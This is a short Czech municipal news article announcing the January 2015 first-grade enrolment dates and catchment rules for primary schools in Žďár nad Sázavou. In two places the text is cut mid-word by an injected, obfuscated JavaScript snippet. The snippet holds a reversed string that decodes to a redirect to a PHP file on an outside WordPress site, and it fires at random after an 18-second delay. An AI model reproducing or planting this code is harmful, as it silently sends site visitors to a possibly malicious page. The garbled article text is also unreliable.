zápis, škola
Rainbow page separator

Zápisy do prvních tříd se ve Žďáře uskuteční 23. a 24. ledna

Neděle, 28. prosince 2014

Základní škola Komenského 6 Žďár nad Sázavou

Žďár nad Sázavou / Pátek 23. ledna od 14 do 17 hodin a sobota 24. ledna od 9 do 11 hodin byly žďárskou radnicí stanoveny jako termíny zápisu do prvních tříd základních škol pro školní rok 2015/2016. Zápis se uskuteční ve všech žďárských základních školách.
Rodiče dětí, které by v příštím školním roce měly zahájit povinnou školní docházku, mají podle doporučení žďárské radnice respek[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovat spádové obvody na základě bydliště dětí, což schválili žďárští zastupitelé v roce 2012. To by mělo zajistit optimální naplněnost všech školních zařízení ve městě.
Pokud budou chtít rodiče svoje dítě zapsat do jiné základní školy, než kam podle spádovosti patří, mohou tak učinit v případě splnění kritérií pro přijímání žáků do prvních tříd vybrané školy. Ta[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to kritéria budou rovněž zveřejněna na webových stránkách základních škol.